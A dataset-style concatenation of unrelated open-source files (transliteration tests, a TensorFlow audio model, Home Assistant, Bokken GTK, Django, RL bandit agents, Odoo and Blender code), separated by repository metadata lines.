'Nero Claudius Caesar Augustus Germanicus': \
'네로 클라우디우스 카이사르 아우구스투스 게르마니쿠스',
'NERO CLAVDIVS CAESAR AVGVSTVS GERMANICVS': \
'네로 클라우디우스 카이사르 아우구스투스 게르마니쿠스',
'Gaius Octavius': '가이우스 옥타비우스',
'GAIVS OCTAVIVS': '가이우스 옥타비우스',
'Titus Maccius Plautus': '티투스 마키우스 플라우투스',
'TITVS MACCIVS PLAVTVS': '티투스 마키우스 플라우투스',
'Gaius Plinius Secundus': '가이우스 플리니우스 세쿤두스',
'GAIVS PLINIVS SECVNDVS': '가이우스 플리니우스 세쿤두스',
'Gaius Plinius Caecilius Secundus': \
'가이우스 플리니우스 카이킬리우스 세쿤두스',
'GAIVS PLINIVS CAECILIVS SECVNDVS': \
'가이우스 플리니우스 카이킬리우스 세쿤두스',
'Gnaeus Pompeius Magnus': '그나이우스 폼페이우스 마그누스',
'GNAEVS POMPEIVS MAGNVS': '그나이우스 폼페이우스 마그누스',
'Sextus Aurelius Propertius': \
'섹스투스 아우렐리우스 프로페르티우스',
'SEXTVS AVRELIVS PROPERTIVS': \
'섹스투스 아우렐리우스 프로페르티우스',
'Gaius Sallustius Crispus': '가이우스 살루스티우스 크리스푸스',
'GAIVS SALLVSTIVS CRISPVS': '가이우스 살루스티우스 크리스푸스',
'Lucius Annaeus Seneca': '루키우스 안나이우스 세네카',
'LVCIVS ANNAEUS SENECA': '루키우스 안나이우스 세네카',
'Spartacus': '스파르타쿠스',
'SPARTACVS': '스파르타쿠스',
'Gaius Suetonius Tranquillus': '가이우스 수에토니우스 트랑퀼루스',
'GAIVS SVETONIVS TRANQVILLVS': '가이우스 수에토니우스 트랑퀼루스',
'Lucius Cornelius Sulla Felix': \
'루키우스 코르넬리우스 술라 펠릭스',
'LVCIVS CORNELIVS SVLLA FELIX': \
'루키우스 코르넬리우스 술라 펠릭스',
'Publius Cornelius Tacitus': '푸블리우스 코르넬리우스 타키투스',
'PVBLIVS CORNELIVS TACITVS': '푸블리우스 코르넬리우스 타키투스',
'Marcus Ulpius Nerva Trajanus': \
'마르쿠스 울피우스 네르바 트라야누스',
'MARCUS VLPIVS NERVA TRAIANVS': \
'마르쿠스 울피우스 네르바 트라야누스',
'Publius Vergilius Maro': '푸블리우스 베르길리우스 마로',
'PVBLIVS VERGILIVS MARO': '푸블리우스 베르길리우스 마로',
'Titus Flavius Vespasianus': '티투스 플라비우스 베스파시아누스',
'TITVS FLAVIVS VESPASIANVS': '티투스 플라비우스 베스파시아누스',
'Marcus Vitruvius Pollio': '마르쿠스 비트루비우스 폴리오',
'MARCVS VITRVVIVS POLLIO': '마르쿠스 비트루비우스 폴리오',
})
def test_people_nonroman(self):
self.assert_examples({
'Georgius Agricola': '게오르기우스 아그리콜라',
'Anselmus': '안셀무스',
'Averroës': '아베로에스',
'Aurelius Augustinus Hipponensis': \
'아우렐리우스 아우구스티누스 히포넨시스',
'Carolus Magnus': '카롤루스 마그누스',
'Nicolaus Copernicus': '니콜라우스 코페르니쿠스',
'Cyrus': '키루스',
'Darius': '다리우스',
'Gotarzes': '고타르제스',
'Hannibal': '한니발',
'Flavius Josephus': '플라비우스 요세푸스',
'Mithridates': '미트리다테스',
'Flavius Odoacer': '플라비우스 오도아케르',
})
def test_places(self):
self.assert_examples({
'Aegyptus': '아이깁투스',
'Asia': '아시아',
'Assyria': '아시리아',
'Britannia': '브리탄니아',
'Carthago': '카르타고',
'Cannae': '칸나이',
'Galatia': '갈라티아',
'Gallia': '갈리아',
'Germania': '게르마니아',
'Hispania': '히스파니아',
'Illyricum': '일리리쿰',
'Iudaea': '유다이아',
'Latium': '라티움',
'Lusitania': '루시타니아',
'Numidia': '누미디아',
'Padus': '파두스',
'Parthia': '파르티아',
# u'Pompeii': u'폼페이',
'Roma': '로마',
'Sicilia': '시킬리아',
'Syracusae': '시라쿠사이',
'Thracia': '트라키아',
'Mons Vesuvius': '몬스 베수비우스',
})
def test_texts(self):
self.assert_examples({
'Aeneis': '아이네이스',
'Naturalis Historia': '나투랄리스 히스토리아',
'Commentarii de Bello Gallico': '콤멘타리이 데 벨로 갈리코',
'Confessiones': '콘페시오네스',
'Metamorphoseon': '메타모르포세온',
'Philosophiæ Naturalis Principia Mathematica': \
'필로소피아이 나투랄리스 프링키피아 마테마티카',
})
def test_mythology(self):
self.assert_examples({
'Apollo': '아폴로',
'Bacchus': '바쿠스',
'Ceres': '케레스',
'Diana': '디아나',
'Ianus': '야누스',
'Iuno': '유노',
'Iupitter': '유피테르',
'Mars': '마르스',
'Mercurius': '메르쿠리우스',
'Minerva': '미네르바',
'Neptunus': '넵투누스',
'Pluto': '플루토',
'Saturnus': '사투르누스',
'Venus': '베누스',
'Vesta': '베스타',
'Vulcanus': '불카누스',
})
def test_miscellaneous(self):
self.assert_examples({
'consul': '콘술',
'Pax Romana': '팍스 로마나',
'res publica': '레스 푸블리카',
'senatus': '세나투스',
})
| bsd-3-clause | 8,601,629,544,688,862,000 | 39.020408 | 63 | 0.511346 | false |
WhatDo/FlowFairy | examples/sine_fix/gglu_nopool.py | 1 | 3674 | import tensorflow as tf
import tensorflow.contrib.slim as slim
from flowfairy.conf import settings
from util import lrelu, conv2d, maxpool2d, embedding, avgpool2d, GLU, causal_GLU
from functools import partial
import ops
discrete_class = settings.DISCRETE_CLASS
batch_size = settings.BATCH_SIZE
samplerate = sr = settings.SAMPLERATE
dropout = settings.DROPOUT
learning_rate = settings.LEARNING_RATE
embedding_size = settings.EMBEDDING_SIZE
num_classes = settings.CLASS_COUNT
def broadcast(l, emb):
sh = l.get_shape().as_list()[1]
emb = emb[:, None, None, :]
emb = tf.tile(emb, (1,sh,1,1))
return tf.concat([l, emb], 3)
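# Shape sketch for broadcast() (sizes are illustrative): l of shape
# (batch, sr, 1, C) and emb of shape (batch, E) -> emb is expanded to
# (batch, 1, 1, E), tiled along the time axis to (batch, sr, 1, E) and
# concatenated on axis 3, giving (batch, sr, 1, C + E).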
# Create model
def conv_net(x, cls, dropout, is_training=False):
xs = tf.expand_dims(x, -1)
xs = tf.expand_dims(xs, -1)
conv1 = causal_GLU(xs, 4, [256, 1], scope='conv1_1', normalizer_fn=slim.batch_norm, normalizer_params={'is_training': is_training, 'decay': 0.9})
conv1 = GLU(conv1, 4, [256, 1], scope='conv1_2')
#pool1 = slim.max_pool2d(conv1, [2,1])
print('conv1: ', conv1)
#with tf.name_scope('embedding'):
with tf.variable_scope('embedding'):
emb1 = embedding(cls, embedding_size, num_classes)
embedded = broadcast(conv1, emb1)
print('embedded:', embedded)
#convblock 2
conv2 = GLU(embedded, 8, [256, 1], scope='conv2_1')
conv2 = GLU(conv2, 8, [256, 1], scope='conv2_2')
#pool2 = slim.max_pool2d(conv2, [2,1])
print('conv2: ', conv2)
#convblock 3
conv3 = GLU(conv2, 16, [256, 1], scope='conv3_1')
conv3 = GLU(conv3, 16, [256, 1], scope='conv3_2')
print('conv3: ', conv3)
#convblock 4
#conv4 = tf.depth_to_space(conv3, 4) #upconv
#print('d2sp: ', conv4)
#conv4 = tf.reshape(conv4, shape=[-1, sr, 1, 4]) # reshape upconvolution to have proper shape
conv4 = GLU(conv3, 16, [256, 1], scope='conv4_1')
conv4 = GLU(conv4, 16, [256, 1], scope='conv4_2')
print('conv4: ', conv4)
#convblock 5
conv5 = tf.concat([conv4, conv1], 3) # <- unet like concat first with last
conv5 = GLU(conv5, 16, [256, 1], scope='conv5')
conv5 = GLU(conv5, discrete_class, [2,1], scope='out')
print('conv5: ', conv5)
#out
out = tf.reshape(conv5, [-1, sr, discrete_class])
print('out: ', out)
return out
class Net:
def __init__(self):
pass
def feedforward(self, x, y, frqid, frqid2, is_training=False):
pred = conv_net(x, frqid, None, is_training)
target_output = tf.reshape(y,[-1])
prediction = tf.reshape(pred,[-1, discrete_class])
# Define loss and optimizer
cost = tf.losses.sparse_softmax_cross_entropy(logits = prediction,
labels = target_output,
scope='xentropy')
correct_pred = tf.equal(tf.argmax(pred, 2), y)
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
return pred, cost, accuracy
def train(self, **kwargs):
self.train_x = kwargs['x']
self.train_y = kwargs['y']
self.train_pred, self.train_cost, self.train_acc = self.feedforward(is_training=True, **kwargs)
self.optimizer = ops.train()
def validation(self, **kwargs):
self.val_x = kwargs['x']
self.val_y = kwargs['y']
self.val_pred, self.val_cost, self.val_acc = self.feedforward(**kwargs)
self.val_pred = tf.Print(self.val_pred, [kwargs['frqid'], kwargs['frqid2']], message='frqids: ')
def begin(self, session):
#session.run(self.init)
pass
def should_stop(self):
return False
| mit | 6,973,295,967,363,852,000 | 31.803571 | 149 | 0.605335 | false |
fbradyirl/home-assistant | script/hassfest/ssdp.py | 1 | 2564 | """Generate ssdp file."""
from collections import OrderedDict, defaultdict
import json
from typing import Dict
from .model import Integration, Config
BASE = """
\"\"\"Automatically generated by hassfest.
To update, run python3 -m script.hassfest
\"\"\"
SSDP = {}
""".strip()
def sort_dict(value):
"""Sort a dictionary."""
return OrderedDict((key, value[key]) for key in sorted(value))
def generate_and_validate(integrations: Dict[str, Integration]):
"""Validate and generate ssdp data."""
data = {
"st": defaultdict(list),
"manufacturer": defaultdict(list),
"device_type": defaultdict(list),
}
for domain in sorted(integrations):
integration = integrations[domain]
if not integration.manifest:
continue
ssdp = integration.manifest.get("ssdp")
if not ssdp:
continue
try:
with open(str(integration.path / "config_flow.py")) as fp:
content = fp.read()
if (
" async_step_ssdp" not in content
and "register_discovery_flow" not in content
):
integration.add_error("ssdp", "Config flow has no async_step_ssdp")
continue
except FileNotFoundError:
integration.add_error(
"ssdp", "SSDP info in a manifest requires a config flow to exist"
)
continue
for key in "st", "manufacturer", "device_type":
if key not in ssdp:
continue
for value in ssdp[key]:
data[key][value].append(domain)
data = sort_dict({key: sort_dict(value) for key, value in data.items()})
return BASE.format(json.dumps(data, indent=4))
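# The generated module body looks roughly like this (domain names and SSDP
# values below are illustrative, not taken from real manifests):
#
# SSDP = {
#     "st": {"urn:schemas-example-org:device:Thing:1": ["example"]},
#     "manufacturer": {"Example Corp": ["example"]},
#     "device_type": {"urn:schemas-example-org:device:Thing:1": ["example"]}
# }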
def validate(integrations: Dict[str, Integration], config: Config):
"""Validate ssdp file."""
ssdp_path = config.root / "homeassistant/generated/ssdp.py"
config.cache["ssdp"] = content = generate_and_validate(integrations)
with open(str(ssdp_path), "r") as fp:
if fp.read().strip() != content:
config.add_error(
"ssdp",
"File ssdp.py is not up to date. " "Run python3 -m script.hassfest",
fixable=True,
)
return
def generate(integrations: Dict[str, Integration], config: Config):
"""Generate ssdp file."""
ssdp_path = config.root / "homeassistant/generated/ssdp.py"
with open(str(ssdp_path), "w") as fp:
fp.write(config.cache["ssdp"] + "\n")
| apache-2.0 | 1,920,420,221,825,948,000 | 28.136364 | 87 | 0.578393 | false |
inguma/bokken | ui/graph.py | 1 | 6901 | # graph.py
#
# Copyright 2011 Hugo Teso <[email protected]>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
from gi.repository import Gtk
from gi.repository import GObject
from PIL import Image
import os, tempfile
from subprocess import *
import ui.mydot_widget as mydot_widget
import graph_bar
class MyDotWidget(Gtk.HBox):
'''Working'''
def __init__(self, core, main):
self.uicore = core
self.main = main
self.last_fcn = ''
#dotcode = self.uicore.get_callgraph()
#GObject.GObject.__init__(self, False, 1)
# MEOW
GObject.GObject.__init__(self)
self.side_vb = Gtk.VBox(False, 1)
self.side_hb = Gtk.HBox(False, 1)
#self.dot_widget = DotWidget()
self.dot_widget = mydot_widget.MyDotWidget(self.uicore, self.main)
self.create_tree()
self.create_preview()
self.pack_start(self.dot_widget, True, True, 0)
self.bar = graph_bar.GraphBar(self.dot_widget, self, self.uicore)
#self.pack_start(self.bar, False, False, 0)
self.side_hb.pack_start(self.bar, False, False, 1)
if self.uicore.backend == 'radare':
self.pack_start(self.side_vb, False, False, 1)
self.side_hb.pack_start(self.sw, True, True, 1)
self.side_vb.pack_start(self.side_hb, True, True, 1)
self.side_vb.pack_start(self.preview, False, False, 0)
def set_dot(self, dotcode):
dotcode = dotcode.replace('overlap="scale", bgcolor="#475672"', 'overlap="scale", bgcolor="invis"')
dotcode = dotcode.replace('color=azure3, fontcolor=white, fillcolor="#373D49"', 'color=blue, fontcolor="#666666", fillcolor=white')
dotcode = dotcode.replace('fillcolor="#5E82C6"', 'fillcolor="white", color=green')
dotcode = dotcode.replace('color=lightgray, style=filled,', 'color=blue')
dotcode = dotcode.replace('color="lightgray"', 'color="blue"')
dotcode = dotcode.replace('len=1.25, color=azure3', 'len=1.25, color=blue')
dotcode = dotcode.replace('color=lightgray', 'color=lightgray, bgcolor=white')
dotcode = dotcode.replace('color="green"', 'color="green", fontname="Courier", fontsize="8"')
self.dot_widget.set_dotcode(dotcode)
self.generate_thumbnail(dotcode)
if self.uicore.backend == 'radare':
self.nodes = {}
function = ''
for node in self.dot_widget.graph.nodes:
function = ''
if node.url:
function, node_name = node.url.split('/')
self.nodes[node_name] = [node.x, node.y]
if function:
self.update_tree(function)
self.dot_widget.on_zoom_100(None)
# Navigate to first node
if self.uicore.backend == 'radare':
if len(self.nodes) > 1:
node = self.nodes.keys()[0]
self.dot_widget.animate_to(int(self.nodes[node][0]), int(self.nodes[node][1]))
def generate_thumbnail(self, dotcode):
#size = self.tree.allocation.width
size = self.side_hb.get_allocated_width()
tmp_dot = tempfile.NamedTemporaryFile(delete = False)
tmp_dot.write(dotcode)
tmp_dot.close()
cmd = "dot -Tpng " + tmp_dot.name + " > " + tmp_dot.name + ".png"
os.system(cmd)
im = Image.open(tmp_dot.name + ".png")
        im = im.convert('RGBA')
im.thumbnail([size,size], Image.ANTIALIAS)
#im.save(tmp_dot.name + ".png.thumbnail", "JPEG")
        # Add white background as image is transparent
offset_tuple = (im.size[0], im.size[1])
final_thumb = Image.new(mode='RGBA',size=offset_tuple, color=(255,255,255,0))
final_thumb.paste(im)
final_thumb.save(tmp_dot.name + ".png.thumbnail", "PNG")
self.fill_preview(tmp_dot.name + ".png.thumbnail")
os.remove(tmp_dot.name)
os.remove(tmp_dot.name + ".png")
os.remove(tmp_dot.name + ".png.thumbnail")
def create_preview(self):
# Create Image window for graph preview
self.preview = Gtk.Image()
self.preview.show()
def fill_preview(self, path):
self.preview.set_from_file(path)
def create_tree(self):
# Scrolled Window
self.sw = Gtk.ScrolledWindow()
self.sw.set_shadow_type(Gtk.ShadowType.ETCHED_IN)
self.sw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
self.store = Gtk.ListStore(str, str)
self.tree = Gtk.TreeView(self.store)
self.sw.add(self.tree)
self.tree.set_rules_hint(True)
# Connect right click popup search menu
self.popup_handler = self.tree.connect('button-press-event', self.popup_menu)
# Create the column
bblocks = Gtk.TreeViewColumn()
bblocks.set_title("Basic Blocks")
cell = Gtk.CellRendererText()
bblocks.pack_start(cell, True)
bblocks.add_attribute(cell, "text", 0)
self.treestore = Gtk.TreeStore(str)
# Add column to tree
self.tree.append_column(bblocks)
self.tree.set_model(self.treestore)
self.tree.expand_all()
def update_tree(self, function):
# Clear contents
self.treestore.clear()
# Iterate bb and add to the tree
it = self.treestore.append(None, [function])
nodes = self.nodes.keys()
nodes.sort()
for element in nodes:
self.treestore.append(it, [element])
self.tree.set_model(self.treestore)
self.tree.expand_all()
def popup_menu(self, tree, event):
if event.button == 1:
coordinates = tree.get_path_at_pos(int(event.x), int(event.y))
# Get the information about the click.
# coordinates is None if the click is outside the rows but inside
# the widget.
if not coordinates:
return False
(path, column, x, y) = coordinates
if len(path) == 2 and self.nodes:
node = self.treestore[path][0]
self.dot_widget.animate_to(int(self.nodes[node][0]), int(self.nodes[node][1]))
| gpl-2.0 | 5,638,959,716,393,014,000 | 37.769663 | 139 | 0.605564 | false |
maurodoglio/taarweb | taarweb/users/provider.py | 1 | 1486 | from allauth.socialaccount.app_settings import QUERY_EMAIL
from allauth.socialaccount.providers.google.provider import (GoogleAccount,
GoogleProvider,
Scope)
class TaarGoogleAccount(GoogleAccount):
def get_profile_url(self):
"""
The profile URL field is called 'profile' for OpenIDConnect profiles,
see https://developers.google.com/+/web/api/rest/openidconnect/getOpenIdConnect
"""
return self.account.extra_data.get('profile')
class TaarGoogleProvider(GoogleProvider):
def extract_uid(self, data):
return str(data['sub'])
def get_default_scope(self):
"Override the default method to prepend 'openid' and add specific order"
scope = ['openid']
if QUERY_EMAIL:
scope.append(Scope.EMAIL)
scope.append(Scope.PROFILE)
return scope
def get_hosted_domain(self):
"If configured returns the Google Apps domain"
return self.get_settings().get('HOSTED_DOMAIN', None)
def get_auth_params(self, request, action):
"If configured, adds the hosted domain to the auth request"
params = super().get_auth_params(request, action)
hosted_domain = self.get_hosted_domain()
if hosted_domain is not None:
params['hd'] = hosted_domain
return params
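# Hedged example of the allauth settings this provider reads; the provider key
# and the domain below are placeholders (the exact key depends on the provider
# id registered with allauth):
#
# SOCIALACCOUNT_PROVIDERS = {
#     "google": {"HOSTED_DOMAIN": "example.com"},
# }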
provider_classes = [TaarGoogleProvider]
| mpl-2.0 | -2,247,812,986,946,630,000 | 34.380952 | 87 | 0.617766 | false |
dmanev/ArchExtractor | ArchExtractor/umlgen/Specific/STK/StkParser/StkJilFileCriteria/StkJilDataCriteria.py | 1 | 2829 |
import re
import PortInterface.ProvidedPort
import PortInterface.RequiredPort
import PortInterface.SenderReceiverInterface
import Datatype.ArrayDataType
import PortInterface.DataElement
import StkParser.StkPortCriteria
import Components.IComponent
import Parser.IPortCriteria
class StkJilDataCriteria(StkParser.StkPortCriteria.StkPortCriteria):
"""STK JIL file data access criteria"""
def execute(self, inpTextContent, inoutIComponent):
## Bouml preserved body begin 0003536F
if re.search(r'Data\s+(\w+)', inpTextContent):
nextItemIsDataConfig = 0
dataName = None
for item in re.split(r'(Data\s+\w+)', inpTextContent):
nameMatchObj = re.search(r'Data\s+(\w+)', item)
if nameMatchObj:
nextItemIsDataConfig = 1
dataName = nameMatchObj.group(1)
elif nextItemIsDataConfig:
nextItemIsDataConfig = 0
dataProps = self.extractLevelOneBlock(item)
if dataProps:
dataType, hasArray = re.findall(r'\s*Type\s*=\s*([US]\d+)(Array|)',
dataProps, re.I)[0]
dtf = self.getDataTypeFactory()
DT = dtf.getDataType(dataType)
DE = PortInterface.DataElement.DataElement()
DE.setName(dataName)
if hasArray:
arrayProps = self.extractLevelOneBlock(dataProps)
arraySize = re.findall(r'\s*Size\s*=\s*(\d+)',
arrayProps, re.I)[0]
arrayDT = dtf.getArrayDataType('Arr'+arraySize+dataType)
arrayDT.itsDataType = DT
arrayDT.setMaxNumberOfElements(arraySize)
DE.itsDataType = arrayDT
else:
DE.itsDataType = DT
pif = self.getPortInterfaceFactory()
sendRecvIf = pif.getSenderReceiverIf(dataName, [DE])
provPortSetter = PortInterface.ProvidedPort.ProvidedPort(sendRecvIf)
provPortSetter.setName("set"+dataName)
provPortGetter = PortInterface.ProvidedPort.ProvidedPort(sendRecvIf)
provPortGetter.setName("get"+dataName)
inoutIComponent.addPort(provPortSetter)
inoutIComponent.addPort(provPortGetter)
return inoutIComponent
## Bouml preserved body end 0003536F
def __init__(self):
super(StkJilDataCriteria, self).__init__()
pass
| gpl-3.0 | 6,982,030,154,229,971,000 | 47.775862 | 92 | 0.537292 | false |
andreweskeclarke/reinforcement_learning | src/agents.py | 1 | 5084 | import math
import random
class Agent:
def __init__(self, actions, options={}):
self.rgen = random.SystemRandom() # cryptographically secure, unlike random
self.actions = actions
self.last_action = None
def __choose_exploitative_action__(self):
raise Exception('Not implemented!')
def __choose_exploratory_action__(self):
raise Exception('Not implemented!')
def __should_exploit__(self):
raise Exception('Not implemented!')
def __update__(self, reward, state=None):
raise Exception('Not implemented!')
def choose(self):
if self.__should_exploit__():
self.last_action = self.__choose_exploitative_action__()
else:
self.last_action = self.__choose_exploratory_action__()
return self.last_action
def update(self, reward, state=None):
self.__update__(reward, state=None)
class EGreedyAgent(Agent):
def __init__(self, actions, options={}):
super(EGreedyAgent, self).__init__(actions, options)
use_optimistic = 'optimistic' in options and options['optimistic']
initial_reward = 5 if use_optimistic else 0
        self.avg_rewards = [initial_reward for a in self.actions]
self.n_observations = [0 for a in self.actions]
self.epsilon = options['epsilon']
def __choose_exploitative_action__(self):
return self.avg_rewards.index(max(self.avg_rewards))
def __choose_exploratory_action__(self):
return self.rgen.choice(self.actions)
def __should_exploit__(self):
return self.rgen.random() < (1 - self.epsilon)
def __update__(self, reward, state=None):
last_action = self.last_action
avg = self.avg_rewards[last_action]
self.n_observations[last_action] += 1
self.avg_rewards[last_action] = avg + (reward - avg)/self.n_observations[last_action]
def softmax_choice(rgen, actions, action_prefs):
choice = rgen.random()
cumulative_probability = 1
softmax_denominator = sum([math.exp(p) for p in action_prefs])
for a in actions:
softmax_a = math.exp(action_prefs[a]) / softmax_denominator
cumulative_probability = cumulative_probability - softmax_a
if cumulative_probability <= choice:
return a
assert(False)
def discrete_choice(rgen, actions, action_prefs):
choice = rgen.random()
cumulative_probability = 1
for a in actions:
cumulative_probability = cumulative_probability - action_prefs[a]
if cumulative_probability <= choice:
return a
assert(False)
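# Worked example with illustrative numbers: for action_prefs = [0.0, 1.0],
# softmax_choice samples action 0 with probability exp(0)/(exp(0)+exp(1)) ~ 0.27
# and action 1 with probability exp(1)/(exp(0)+exp(1)) ~ 0.73, so action 1 is
# picked roughly three times out of four. discrete_choice assumes action_prefs
# already sum to 1 (e.g. [0.25, 0.75]) and samples actions with exactly those
# probabilities.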
class EGreedySoftmaxAgent(EGreedyAgent):
def __choose_exploratory_action__(self):
return softmax_choice(self.rgen, self.actions, self.avg_rewards)
class ReinforcementComparisonAgent(Agent):
def __init__(self, actions, options={}):
super(ReinforcementComparisonAgent, self).__init__(actions, options)
self.action_preferences = [0 for a in self.actions]
self.alpha = options['alpha']
self.beta = options['beta']
self.reference_reward = 0
self.last_action = None
def __choose_exploitative_action__(self):
        raise Exception('Unreachable code was reached!')
def __choose_exploratory_action__(self):
return softmax_choice(self.rgen, self.actions, self.action_preferences)
def __should_exploit__(self):
return False
def __update__(self, reward, state=None):
old_pref = self.action_preferences[self.last_action]
self.action_preferences[self.last_action] = old_pref + self.beta * (reward - self.reference_reward)
self.reference_reward = self.reference_reward + self.alpha * (reward - self.reference_reward)
class PursuitAgent(Agent):
def __init__(self, actions, options={}):
super(PursuitAgent, self).__init__(actions, options)
use_optimistic = 'optimistic' in options and options['optimistic']
initial_reward = 5 if use_optimistic else 0
        self.avg_rewards = [initial_reward for a in self.actions]
self.n_observations = [0 for a in self.actions]
self.action_probs = [1.0/len(self.actions) for a in self.actions]
self.beta = options['beta']
def __choose_exploitative_action__(self):
        raise Exception('Unreachable code was reached!')
def __choose_exploratory_action__(self):
return discrete_choice(self.rgen, self.actions, self.action_probs)
def __should_exploit__(self):
return False
def __update__(self, reward, state=None):
last_action = self.last_action
avg = self.avg_rewards[last_action]
self.n_observations[last_action] += 1
self.avg_rewards[last_action] = avg + (reward - avg)/self.n_observations[last_action]
max_index = self.avg_rewards.index(max(self.avg_rewards))
for i in range(0, len(self.action_probs)):
prob = self.action_probs[i]
if i != max_index:
self.action_probs[i] = prob + (self.beta * (0 - prob))
else:
self.action_probs[i] = prob + (self.beta * (1 - prob))
| mit | -68,055,493,988,964,190 | 35.84058 | 107 | 0.635917 | false |
escsun/radio-shop | catalog/views.py | 1 | 1793 | from django.shortcuts import render, get_object_or_404
from .models import Category, Product, Value
from django.contrib import messages
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.core.exceptions import ObjectDoesNotExist
from cart.forms import CartAddProductForm
def catalog_index(request, id=None):
categories = Category.objects.filter(parent_id=id)
try:
category = Category.objects.get(id=id)
except ObjectDoesNotExist:
category = Category.objects.none()
if not categories:
products_list = Product.objects.filter(category_id=id, is_available=True)
paginator = Paginator(products_list, per_page=25)
page = request.GET.get('page')
cart_product_form = CartAddProductForm()
try:
products = paginator.page(page)
except PageNotAnInteger:
products = paginator.page(1)
except EmptyPage:
products = paginator.page(paginator.num_pages)
if not products:
messages.error(request, "В данной категории товаров нет")
return render(request, 'catalog_products.html', {
"products": products,
"category": category,
"cart_product_form": cart_product_form
})
response = render(request, 'catalog_base.html', {
"categories": categories,
"category": category
})
return response
def catalog_product_detail(request, id):
product = Product.objects.get(id=id)
category = Category.objects.get(id=product.category.id)
values = Value.objects.filter(product_id=id)
return render(request, 'catalog_product_detail.html', {
"product": product,
"values": values,
"category": category
}) | gpl-3.0 | 3,052,322,435,605,630,000 | 34.36 | 81 | 0.664969 | false |
factorlibre/carrier-delivery | delivery_carrier_mrw/__openerp__.py | 1 | 1595 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2015 FactorLibre (http://www.factorlibre.com)
# Hugo Santos <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'MRW Deliveries WebService',
'version': '0.1',
'author': "FactorLibre",
'category': 'Sales Management',
'depends': [
'delivery',
'base_delivery_carrier_label'
],
'website': 'http://factorlibre.com',
'data': [
'security/ir.model.access.csv',
'view/mrw_config_view.xml',
'view/delivery_view.xml',
'view/stock_view.xml'
],
'demo': [],
'installable': True,
'auto_install': False,
'license': 'AGPL-3',
'external_dependencies': {
'python': ['suds'],
}
}
| agpl-3.0 | -2,021,363,104,424,025,300 | 35.25 | 78 | 0.576176 | false |
niacdoial/blemd | pseudobones.py | 1 | 21031 | from mathutils import Vector, Euler, Matrix
import bpy
import math
import re
from .common import dict_get_set
from . import common
from .Matrix44 import rotation_part
# import weakref
import logging
log = logging.getLogger('bpy.ops.import_mesh.bmd.pseudobones')
NtoB = Matrix([[1,0,0,0],
[0,0,-1,0],
[0,1,0,0],
[0,0,0,1]])
BtoN = Matrix([[1,0,0,0],
[0,0,1,0],
[0,-1,0,0],
[0,0,0,1]])
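# Applied to a column vector, NtoB maps (x, y, z) to (x, -z, y) and BtoN is its
# inverse, i.e. they convert between the model file's Y-up convention and
# Blender's Z-up convention (reading N/B as native/Blender is our assumption
# about the naming, not something stated in the code).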
def product(lamb, vct):
ret = vct.copy()
ret.x *= lamb
ret.y *= lamb
ret.z *= lamb
return ret
def sum2(vct1, vct2):
ret = vct1.copy()
ret.x += vct2.x
ret.y += vct2.y
ret.z += vct2.z
return ret
def subtract2(vct1, vct2):
ret = vct1.copy()
ret.x -= vct2.x
ret.y -= vct2.y
ret.z -= vct2.z
return ret
def vect_normalize(vect):
length = math.sqrt(vect.x**2 + vect.y**2 + vect.z**2)
if length < .01:
log.error('Vector to be normalized is near zero. Returning (0,0,1) to avoid crashes')
return Vector((0,0,1))
tempv = vect
tempv.x /= length
tempv.y /= length
tempv.z /= length
return tempv
def cubic_interpolator(t1, y1, d1, t2, y2, d2, t):
if -0.001 < t2-t1 < 0.001:
        log.warning('cannot interpolate between almost identical times')
        return (y1+y2) / 2, 0, 0
tn = (t-t1)/(t2-t1) # normalized time coordinate
d1 *= (t2-t1) # adapted derivatives for the normalized time interval
d2 *= (t2-t1)
# temporary values
# for the value
ya = (2*tn**3 - 3*tn**2 + 1)*y1
yb = (tn**3 - 2*tn**2 + tn)*d1
yc = (-2*tn**3 + 3*tn**2)*y2
yd = (tn**3 - tn**2)*d2
# and the tangent (will have to be corrected since d(a(b))=d(b)*d(a)(b))
da = (6*tn**2 - 6*tn) * y1
db = (3*tn**2 - 4*tn + 1) * d1
dc = (-6*tn**2 + 6*tn) * y2
dd = (3*tn**2 - 2*tn) * d2
y = ya+yb+yc+yd
d = (da+db+dc+dd)/(t2-t1)
return y, d, d
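# cubic_interpolator() evaluates a cubic Hermite segment on [t1, t2]: the four
# polynomials in tn are the Hermite basis functions h00, h10, h01, h11, the
# tangents are pre-multiplied by (t2-t1) because time is normalised to [0, 1],
# and the returned tangent is divided by (t2-t1) again to undo that rescaling.
# Quick sanity check with illustrative values: t1=0, t2=1, y1=0, y2=1 and both
# tangents equal to 1 give the identity curve, so at t=0.5 the value is 0.5 and
# the tangent is 1.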
###
# the goal here is to get the matrix adapted to blender animation
# (from default pose to correct pose)
# in blender, the matrix chain looks like
# this (each contains translation and rotation):
# origin_s*origin_d*bone_1_s*bone_1_d*....*bone_n_s*bone_n_d
def get_dynamic_mtx(p_bone, frame):
if frame not in p_bone.computed_d_matrices.keys():
local_mtx_y, local_mtx_ydL, local_mtx_ydR = p_bone.frames.get_mtx(frame)
inv_static_mtx = p_bone.jnt_frame.getFrameMatrix().inverted()
p_bone.computed_d_matrices[frame] = (inv_static_mtx * local_mtx_y,
inv_static_mtx * local_mtx_ydL,
inv_static_mtx * local_mtx_ydR)
return p_bone.computed_d_matrices[frame]
def get_pos_vct(p_bone, frame):
EPSILON = 1E-4
y, ydL, ydR = get_dynamic_mtx(p_bone, frame)
y = y.to_translation()
